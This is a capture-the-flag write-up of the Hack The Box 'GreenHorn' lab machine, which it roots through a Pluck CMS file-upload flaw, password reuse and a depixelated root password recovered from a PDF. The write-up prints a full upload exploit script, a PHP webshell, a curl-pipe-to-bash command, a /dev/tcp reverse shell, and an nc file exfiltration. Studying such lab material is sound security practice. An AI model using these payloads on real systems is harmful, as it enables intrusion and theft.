GreenHorn
Hack The Box Machine Writeup
He is contemplating why a horn is growing out of his head
Summary
Green horn was an easy Linux box that had a pretty standard user step but a very interesting way to root. User centers around exploiting a Pluck CMS instance with a little lateral movement and root involves deblurring a password from a pdf file.
To overcome User first the attacker must find a hashed password on the Gitea server hosted on port 3000. This can then be used to exploit Pluck via an arbitrary file upload. A webshell can then be used to gain a reverse shell as www-data. To move laterally to the Junior user and grab user.txt the cracked password can be reused with SU.
The root step was what makes this box so interesting. There is a PDF in the Junior users home directory. this contains a PDF with an embedded image which is a blurred version of roots password. The blurred password can be unblurred via Depix and one of its default search images but the processes is finicky. Once the password is obtained it can be used with SSH to gain a root shell and grab root.txt completing the machine.
Not sure what this box had to do with horns or green
User
Recon
Portscan with Nmap
I began by enumerating the listening ports on the machine using an nmap scan. sudo runs the -sS stealth scan by default instead of the slower -sT connect scan type. -sC runs default enumeration scripts and -sV attempts to find version information
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sC -sV 10.10.11.25
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 09:10 EDT
Nmap scan report for 10.10.11.25
Host is up (0.028s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
|_ 256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://greenhorn.htb/
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=cf4121b51a3e5660; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=IevIeKIx-KJd_r5t_9NiCKlR2iY6MTcyMTc0MDIyODM2NDA4MDI0OA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Tue, 23 Jul 2024 13:10:28 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>GreenHorn</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=a0b61cd060d1e915; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=FJiY_Avwt07YmmN8DjgtymGf_Ag6MTcyMTc0MDIzMzY2MDQzODk0Mg; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Tue, 23 Jul 2024 13:10:33 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94SVN%I=7%D=7/23%Time=669FABC3%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(GetRequest,2A60,"HTTP/1\.0\x20200\x20OK\r\nCache-Contr
SF:ol:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nCo
SF:ntent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_git
SF:ea=cf4121b51a3e5660;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Coo
SF:kie:\x20_csrf=IevIeKIx-KJd_r5t_9NiCKlR2iY6MTcyMTc0MDIyODM2NDA4MDI0OA;\x
SF:20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Opt
SF:ions:\x20SAMEORIGIN\r\nDate:\x20Tue,\x2023\x20Jul\x202024\x2013:10:28\x
SF:20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"the
SF:me-auto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=dev
SF:ice-width,\x20initial-scale=1\">\n\t<title>GreenHorn</title>\n\t<link\x
SF:20rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW1lIjoiR
SF:3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6
SF:Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmh
SF:vcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLC
SF:JzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvY
SF:X")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(HTTPOptions,1A4,"HTTP/1\.0\x20405\x20Method\x20Not\x20All
SF:owed\r\nAllow:\x20HEAD\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-Cont
SF:rol:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nS
SF:et-Cookie:\x20i_like_gitea=a0b61cd060d1e915;\x20Path=/;\x20HttpOnly;\x2
SF:0SameSite=Lax\r\nSet-Cookie:\x20_csrf=FJiY_Avwt07YmmN8DjgtymGf_Ag6MTcyM
SF:Tc0MDIzMzY2MDQzODk0Mg;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20Sam
SF:eSite=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Tue,\x2023\x20J
SF:ul\x202024\x2013:10:33\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPR
SF:equest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.45 seconds
There is SSH open on port 22 and a web server running Nginx with a redirect to greenhorn.htb. I will add that to my /etc/hosts file so it can be resolved correctly. There is also a strange service on port 3000 that appears to be some kind of web server based on the 200 response to a GET request.
┌──(kali㉿kali)-[~/Desktop]
└─$ tail -n 1 /etc/hosts
10.10.11.25 greenhorn.htbFuzzing for virtual hosts with Wfuzz
Whenever I see a domain for a web server in use I always like to try and fuzz scan for possible vhosts and see if I can discover any other sites. Vhosts are like sub domains but are not quite the same thing. Vhosts route requests to the correct website/resource based on the Host web header so we can brute force that header and if there is a unique response we might have discovered a new web application.
For wfuzz -u determines the url and -H sets the headers. This is where we set the FUZZ keyword to replace. -w sets the word list. I run the request once to see the default response length and then filter on the Ch count with --hh 154
┌──(kali㉿kali)-[~/Desktop]
└─$ wfuzz -u http://greenhorn.htb -H "Host:FUZZ.greenhorn.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hh 154
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://greenhorn.htb/
Total requests: 19966
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 58.79757
Processed Requests: 19966
Filtered Requests: 19966
Requests/sec.: 339.5718
No vhosts this time it appears.
Web server enumeration 80
On port 80 appears a pretty basic site with 2 tabs and some welcome messages. The pages also appear to be loaded in via the file parameter, a common trope in php.
.PNG)
Looks like a basic PHP site to me
A quick check for LFI reveals that there are defensive measures in place. We might be able to get around this later though, so it's a thing to note.
.PNG)
Always a good idea to fully enumerate before attempting exploitation
There is also a link to /login.php at the bottom of the page (admin) and it shows that the site is powered by Pluck which appears to be a public CMS.
.png)
And a version number, version numbers are huge because we can filter our search for public exploits
The login page has a single password form and leaks the version of pluck as 4.7.18, a high priority is to look for public exploits now since we have the version number. Some basic password checks like admin and password do not work. I also did some basic SQLI checking using ' and ". There also appears to be brute force protection in place after 5 attempts, this is likely not a route we can easily exploit.
.PNG)
While we could spoof our ip to likely get around this blacklist, that is out of scope for an easy machine
It can always be useful to check robots.txt as well as this can sometimes reveal sensitive endpoints.
.PNG)
This shows us a couple directorries but nothing overly useful
Directory bust scan with Feroxbuster
It's always good to fully enumerate, and in this case the possible attack surface is still pretty small so I then ran a directory fuzzing scan. I know the web application is using php so I will add the flag -x php to the scan to have it append to .php to the wordlist. There appears to be some kind of scanning protection in place as after a while every response returns a 502 so I stoped the scan
Why... Wont.... It.... WORK....
GitTEA port 3000
This appears to be the Gitea site for the box. Gitea is like a private github where code can be shared and stored.
.PNG)
Care for a cupa?
Clicking explore at the top right we can see one repository that can be viewed as a guest.
.PNG)
Well hello there.
This appears to be the code for the website found on port 80. Exploring around I was mainly looking for hard coded credentials that might have been forgotten and inside GreenHorn/data/settings/pass.php there is a hardcoded password hash of some kind.
.PNG)
Hard coded creds is always a top security concern
How real men make tea
Crack password hash
I saved the hash to a file and then tried to run it through Hashcats auto detection. It detected a couple possibilities including SHA2-512, SHA3-512, and others.
Looking at the example hashes given by hashcat is not very useful either. While I began looking for indications of hashtype in the source code I tried 1700 SHA2-512 in the background (going through the list one by one) and it cracked very quickly to: iloveyou1.
┌──(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 1700 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<...>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b324d7790163:iloveyou1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1700 (SHA2-512)
<...>
Started: Tue Jul 23 10:12:45 2024
Stopped: Tue Jul 23 10:13:02 2024Now we just need somewhere to use the password. I first tried admin:iloveyou1 on the Gitea to no luck.
Trying it on the pluck login however works and we are redirected to the admin dashboard. From most admin dashboards there is often a way to RCE so this is very promising.
.png)
What the pluck!
When you got them admin creds
Pluck exploit
Googling for pluck 4.7.18 exploit a couple quickly caught my eye. There seems to be an RCE exploit based on an arbitrary file upload function of the application. There is a POC on exploit-db that helped me better understand the exploit.
It looks like if we can get logged into the application, which we can thanks to the cracked password hash, we can upload a zipfile reverse shell. The POC shows us the basic structure - we need to change the login_url, the upload_url, and the password to match GreenHorn's instance. The final script is below:
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
login_url = "http://greenhorn.htb/login.php"
upload_url = "http://greenhorn.htb/admin.php?action=installmodule"
headers = {"Referer": login_url,}
login_payload = {"cont1": "admin","bogus": "iloveyou1","submit": "Log in"}
file_path = input("ZIP file path: ")
multipart_data = MultipartEncoder(
fields={
"sendfile": ("shell.zip", open(file_path, "rb"), "application/zip"),
"submit": "Upload"
}
)
session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)
if login_response.status_code == 200:
print("Login account")
upload_headers = {
"Referer": upload_url,
"Content-Type": multipart_data.content_type
}
upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)
if upload_response.status_code == 200:
print("ZIP file download.")
else:
print("ZIP file download error. Response code:", upload_response.status_code)
else:
print("Login problem. response code:", login_response.status_code)
rce_url="http://greenhorn.htb/data/modules/shell/shell.php"
rce=requests.get(rce_url)
print(rce.text)
So the first thing we need to do is create a php webshell file called shell.php that will use the system function to execute the command we pass in a get request cmd parameter.
┌──(kali㉿kali)-[~/Desktop]
└─$ cat shell.php
<?php system($_GET['cmd']); ?>Next we must zip that file as shown in the exploit POC.
┌──(kali㉿kali)-[~/Desktop]
└─$ zip shell.zip shell.php
adding: shell.php (stored 0%)And run the exploit.
┌──(kali㉿kali)-[~/Desktop]
└─$ python pluck.py
ZIP file path: /home/kali/Desktop/shell.zip
Login account
ZIP file download.
File not found.ason the POC was not working for me so I decided to just do it manually. I went to[ http://greenhorn.htb/admin.php?action=installmodule](http://greenhorn.htb/admin.php?action=installmodule) and uploaded the shell.zip folder.
.PNG)
sometimes you just gotta do it yourself
Then I went manually to the address[ http://greenhorn.htb/data/modules/shell/shell.php](http://greenhorn.htb/data/modules/shell/shell.php) and demonstrated RCE.
.png)
Code execution is always a great feeling
You will have to be quick as it looks like there is a script that cleans out the modules every couple of minutes.
bascially lol
Shell as www-data
Now we have to get a reverse shell. In order to avoid any URL encoding issues my plan is to host a bash reverse shell with a python http server and then fetch that with curl and pipe it into bash.
revshells.com is a good way to generate reverse shells. The command curl http://10.10.14.6:8000/rev.sh | bash is the payload that will execute the shell by fetching it and passing it into bash.
┌──(kali㉿kali)-[~/Desktop]
└─$ cat rev.sh
#! /bin/bash
bash -i >& /dev/tcp/10.10.14.6/42069 0>&1
┌──(kali㉿kali)-[~/Desktop]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.25 - - [23/Jul/2024 10:36:59] "GET /rev.sh HTTP/1.1" 200 -
### URL
http://greenhorn.htb/data/modules/shell/shell.php?cmd=curl%20http://10.10.14.6:8000/rev.sh%20|%20bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 42069
listening on [any] 42069 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.25] 47424
bash: cannot set terminal process group (1095): Inappropriate ioctl for device
bash: no job control in this shell
www-data@greenhorn:~/html/pluck/data/modules/shell$Script shell upgrade
Whenever I can, I like to upgrade the TTY functions of my shells so I can use things like tab autocomplete and the arrow keys. My way to accomplish this is by leveraging the script binary.
www-data@greenhorn:~/html/pluck/data/modules/shell$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@greenhorn:~/html/pluck/data/modules/shell$ ^Z
zsh: suspended nc -lvnp 42069
┌──(kali㉿kali)-[~/Desktop]
└─$ stty raw -echo;fg
[1] + continued nc -lvnp 42069
reset
reset: unknown terminal type unknown
Terminal type? screen
www-data@greenhorn:~/html/pluck/data/modules/shell$Shell as Junior
We still don't have user.txt yet so looking in /home it looks like we will need to move laterally to the junior user.
www-data@greenhorn:/home$ ls
git juniorIt's always a good idea to try every password user combination you can with every service you have. Password reuse is very common both in CTF challenges and in the real world. In this case trying the iloveyou1 password discovered earlier with the junior user works with a simple su command to switch to the user and we can grab the user.txt file
www-data@greenhorn:/home$ su junior
Password: iloveyou1
junior@greenhorn:~$ cat user.txt
97b0c7e1730b2faa34358a98f03861a1If this did not work the next place I would look is in the web server configurations for passwords such as database connection credentials. This is a common way to move from a www shell to one as a user.
Dont reuse passwords next time!
Root
Enumeration
Quick checks
enumerating sudo permissions doesn't reveal the path. looking for interesting Sid files does not turn up anything abnormal either. A check for files owned by the junior group did not turn up anything of note. There is also nothing in /opt.
junior@greenhorn:~$ sudo -l
[sudo] password for junior:
Sorry, user junior may not run sudo on greenhorn.
junior@greenhorn:~$ find / -type f -perm -4000 2>/dev/null
/usr/libexec/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chsh
/usr/bin/umount
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/newgrpOpenVAS.pdf
In the users home directory there is a PDF which is interesting. I exported it back to my attacking host using NC.
junior@greenhorn:~$ nc 10.10.14.6 42069 < 'Using OpenVAS.pdf'
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 42069 > 'Using OpenVAS.pdf'
listening on [any] 42069 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.25] 45976looking at the pdf there is a message about OpenVAS and the sudo user using the command sudo /usr/sbin/openvas. there is then what appears to be a blurred password which is presumably the root users password.
.PNG)
Very interesting
Deblur password with Depix
After doing a bit more enumeration on the box and finding nothing it seemed like the path forward was deblurring the password from the PDF. Some Google searching ended up with the Depix program.
We can see the directions on the project page.
Making a Search Image
Making a Pixelized Image
It looks like we need to feed it an image file so right clicked the blurred password in the pdf and saved it to my desktop.
I honestly have no idea what it is talking about with a De Bruijin sequence so I simply ran the tool with the included search images until finding one that works debruinseq_notepad_Windows10_closeAndSpaced.png
I think that what we are supplying is a reference file for the application to deblur and test against?
┌──(kali㉿kali)-[~/Desktop]
└─$ git clone https://github.com/spipm/Depix.git
Cloning into 'Depix'...
remote: Enumerating objects: 250, done.
remote: Counting objects: 100% (93/93), done.
remote: Compressing objects: 100% (35/35), done.
remote: Total 250 (delta 63), reused 69 (delta 56), pack-reused 157
Receiving objects: 100% (250/250), 851.02 KiB | 8.34 MiB/s, done.
Resolving deltas: 100% (118/118), done.
┌──(kali㉿kali)-[~/Desktop]
└─$ cd Depix
┌──(kali㉿kali)-[~/Desktop/Depix]
└─$ python depix.py -p ../password.png -s ./images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-07-23 11:27:01,451 - Loading pixelated image from ../password.png
2024-07-23 11:27:01,470 - Loading search image from ./images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-07-23 11:27:02,212 - Finding color rectangles from pixelated space
2024-07-23 11:27:02,213 - Found 252 same color rectangles
2024-07-23 11:27:02,214 - 190 rectangles left after moot filter
2024-07-23 11:27:02,214 - Found 1 different rectangle sizes
2024-07-23 11:27:02,214 - Finding matches in search image
2024-07-23 11:27:02,214 - Scanning 190 blocks with size (5, 5)
2024-07-23 11:27:02,238 - Scanning in searchImage: 0/1674
2024-07-23 11:27:35,274 - Removing blocks with no matches
2024-07-23 11:27:35,275 - Splitting single matches and multiple matches
2024-07-23 11:27:35,278 - [16 straight matches | 174 multiple matches]
2024-07-23 11:27:35,278 - Trying geometrical matches on single-match squares
2024-07-23 11:27:35,514 - [29 straight matches | 161 multiple matches]
2024-07-23 11:27:35,515 - Trying another pass on geometrical matches
2024-07-23 11:27:35,716 - [41 straight matches | 149 multiple matches]
2024-07-23 11:27:35,716 - Writing single match results to output
2024-07-23 11:27:35,717 - Writing average results for multiple matches to output
2024-07-23 11:27:37,510 - Saving output image to: output.pngThis reveals the password "side from side the other side side from side the other side"
.PNG)
Kind of reveals it to be fair
IYKYK
Shell as root
Using the password sidefromsidetheothersidesidefromsidetheotherside we are able to ssh as root, grabbing root.txt and completing the machine.
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh root@greenhorn.htb
The authenticity of host 'greenhorn.htb (10.10.11.25)' can't be established.
ED25519 key fingerprint is SHA256:FrgpM50adTncJAsWACDugfF7duPzn9d6RzjZZFHNtLo.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:24: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'greenhorn.htb' (ED25519) to the list of known hosts.
root@greenhorn.htb's password: sidefromsidetheothersidesidefromsidetheotherside
<...>
Last login: Thu Jul 18 12:55:08 2024 from 10.10.14.41
root@greenhorn:~# cat root.txt
d9f9ce6619bc8df9d67978f261bcec60.png)
Man that's a long password, Congrats on completing the box fren
Additional Resources
Ippsec video walkthrough
0xdf writeup
0xdf.gitlab.io